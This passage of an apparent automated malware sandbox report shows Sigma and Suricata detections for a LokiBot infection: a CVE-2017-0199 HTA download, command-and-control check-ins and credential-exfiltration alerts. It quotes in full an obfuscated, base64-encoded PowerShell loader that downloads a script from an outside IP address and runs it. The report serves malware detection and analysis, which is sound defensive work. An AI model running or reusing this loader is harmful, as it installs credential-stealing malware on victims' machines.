SAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", CommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiA

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4008, TargetFilename: C:\Users\user\AppData\Local\Temp\2whqha0s.5gp.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", ProcessId: 3328, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:22:37.665307+0200	2024197	1	A Network Trojan was detected	192.3.176.141	80	192.168.2.22	49164	TCP
2024-10-24T21:22:43.229274+0200	2024197	1	A Network Trojan was detected	192.3.176.141	80	192.168.2.22	49166	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:22:37.665253+0200	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	192.3.176.141	80	TCP
2024-10-24T21:22:43.229261+0200	2024449	1	Attempted User Privilege Gain	192.168.2.22	49166	192.3.176.141	80	TCP

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:26.886644+0200	2024312	1	A Network Trojan was detected	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:29.808663+0200	2024312	1	A Network Trojan was detected	192.168.2.22	49172	94.156.177.220	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:25.857786+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:27.167849+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:29.882996+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:31.085554+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:32.718723+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:34.319094+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:36.550346+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:37.888749+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:39.094384+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:40.351612+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:41.637884+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:42.903713+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:44.172011+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:45.422327+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:46.883325+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:48.406792+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:49.566653+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:50.751878+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:51.961137+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:53.505309+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:55.726103+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:56.972372+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:59.275066+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:00.662976+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:01.927481+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:03.260935+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:04.916021+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:07.357975+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:08.611452+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:10.055685+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:14.427514+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:15.731889+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:17.099666+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:18.288921+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:19.585023+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:30.937971+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49173	TCP
2024-10-24T21:23:32.525580+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49174	TCP
2024-10-24T21:23:34.305427+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49175	TCP
2024-10-24T21:23:36.400835+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49176	TCP
2024-10-24T21:23:37.750078+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49177	TCP
2024-10-24T21:23:38.958628+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49178	TCP
2024-10-24T21:23:40.192064+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49179	TCP
2024-10-24T21:23:41.455373+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49180	TCP
2024-10-24T21:23:42.724663+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49181	TCP
2024-10-24T21:23:43.964080+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49182	TCP
2024-10-24T21:23:45.255136+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49183	TCP
2024-10-24T21:23:46.858270+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49184	TCP
2024-10-24T21:23:47.977146+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49185	TCP
2024-10-24T21:23:49.415576+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49186	TCP
2024-10-24T21:23:50.575297+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49187	TCP
2024-10-24T21:23:51.783242+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49188	TCP
2024-10-24T21:23:53.037216+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49189	TCP
2024-10-24T21:23:55.559391+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49190	TCP
2024-10-24T21:23:56.814340+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49191	TCP
2024-10-24T21:23:59.107737+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49192	TCP
2024-10-24T21:24:00.329944+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49193	TCP
2024-10-24T21:24:01.793729+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49194	TCP
2024-10-24T21:24:03.093210+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49195	TCP
2024-10-24T21:24:04.456210+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49196	TCP
2024-10-24T21:24:07.135690+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49197	TCP
2024-10-24T21:24:08.472218+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49198	TCP
2024-10-24T21:24:09.786399+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49199	TCP
2024-10-24T21:24:14.278170+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49200	TCP
2024-10-24T21:24:15.563775+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49201	TCP
2024-10-24T21:24:16.936123+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49202	TCP
2024-10-24T21:24:18.138996+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49203	TCP
2024-10-24T21:24:19.438433+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49204	TCP
2024-10-24T21:24:20.599686+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.22	49205	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:30.931919+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:32.518744+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:33.892143+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:36.394614+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:37.743711+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:38.952622+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:40.186012+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:41.449167+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:42.717883+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:43.958201+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:45.248595+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:46.621499+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:47.970542+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:49.409576+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:50.569418+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:51.776491+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:53.031405+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:55.553592+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:56.808265+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:59.107069+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:24:00.323075+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:01.787705+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:03.086401+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:04.455922+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:07.129727+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:08.466124+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:09.780520+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:14.272410+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:15.557829+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:16.929590+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:18.132065+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:19.432343+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:20.593841+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:30.931919+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:32.518744+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:33.892143+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:36.394614+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:37.743711+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:38.952622+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:40.186012+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:41.449167+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:42.717883+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:43.958201+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:45.248595+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:46.621499+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:47.970542+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:49.409576+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:50.569418+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:51.776491+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:53.031405+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:55.553592+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:56.808265+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:59.107069+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:24:00.323075+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:01.787705+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:03.086401+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:04.455922+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:07.129727+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:08.466124+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:09.780520+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:14.272410+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:15.557829+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-24T21:24:16.929590+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-24T21:24:18.132065+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-24T21:24:19.432343+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-24T21:24:20.593841+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.220	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:23:25.857786+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49171	94.156.177.220	80	TCP
2024-10-24T21:23:27.167849+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49172	94.156.177.220	80	TCP
2024-10-24T21:23:29.882996+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49173	94.156.177.220	80	TCP
2024-10-24T21:23:31.085554+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49174	94.156.177.220	80	TCP
2024-10-24T21:23:32.718723+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49175	94.156.177.220	80	TCP
2024-10-24T21:23:34.319094+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-24T21:23:36.550346+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-24T21:23:37.888749+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-24T21:23:39.094384+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-24T21:23:40.351612+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-24T21:23:41.637884+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-24T21:23:42.903713+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-24T21:23:44.172011+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-24T21:23:45.422327+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-24T21:23:46.883325+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-24T21:23:48.406792+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-24T21:23:49.566653+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-24T21:23:50.751878+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-24T21:23:51.961137+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-24T21:23:53.505309+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-24T21:23:55.726103+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-24T21:23:56.972372+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-24T21:23:59.275066+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-24T21:24:00.662976+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-24T21:24:01.927481+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-24T21:24:03.260935+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-24T21:24:04.916021+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-24T21:24:07.357975+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-24T21:24:08.611452+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-24T21:24:10.055685+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-24T21:24:14.427514+0200	2021641	1	A Network Trojan was detected	192.168.2.22	49201	94.156.177.220	80	TCP
